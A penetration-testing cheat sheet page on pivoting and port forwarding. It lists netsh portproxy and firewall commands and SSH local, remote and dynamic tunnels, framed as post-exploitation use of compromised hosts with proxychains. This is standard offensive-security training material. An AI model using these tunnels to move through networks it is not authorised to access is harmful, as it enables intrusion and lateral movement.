Pivoting, Tunneling, & Port Forwarding

Netsh (Windows)

#Add IPv4 to IPv4 proxy on the listening port and address, to the remote port and address
netsh interface portproxy add v4tov4 listenport=<port#> listenaddress=<current_IP> connectport=<remote_PORT> connectaddress=<remote_IP>

#Show forwarded port(s)
netsh interface portproxy show all

#Delete forwarded port(s)
netsh interface portproxy delete v4tov4 listenport=<port#> listenaddress=<IP_address>

#Update Windows firewall rules (if neccesary) to allow inbound connections to the port being forwarded 
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<IP_address> localport=<local_port> action=allow

Secure Shell (SSH)

Local Port Forwarding

Tunnel a local port to a remote target through a compromised intermediary using SSH as the transfer protocol

#Establish local port forward to a remote host.
#Do not execute a remote command (-N) and specify a local port forward (-L)
ssh -N -L <local_bind_address>:<local_port>:<target_host>:<target_host_port> <username>@<intermediary_IP>

Remote Port Forwarding

Tunnel a remote port on a compromised target to our host

#SSH from compromised target to our host and establish remote port forward to our host
#Do not execute a remote command (-N) and specify a remote port forward (-R)
ssh -N -R <our_host_IPaddress>:<our_host_listener_port>:<compromised_target_interface>:<compromised_port_to_forward> <username>@<our_host_IPaddress>

#Interact with <our_host_listener_port> on our host machine

Dynamic Port Forwarding

Tunnel incoming traffic to a local listening port to remote destination(s)

#Establish a local dynamic SOCKS4 application-level port forward
ssh -N -D <bind_address>:<bind_port> <compromised_user>@<compromised_host>

#Run tools through the SOCKS4 proxy (e.g. proxychains and updating /etc/proxychains.conf)
proxychains <tool_to_run_through_portforward>

PreviousCloud

Last updated 2 years ago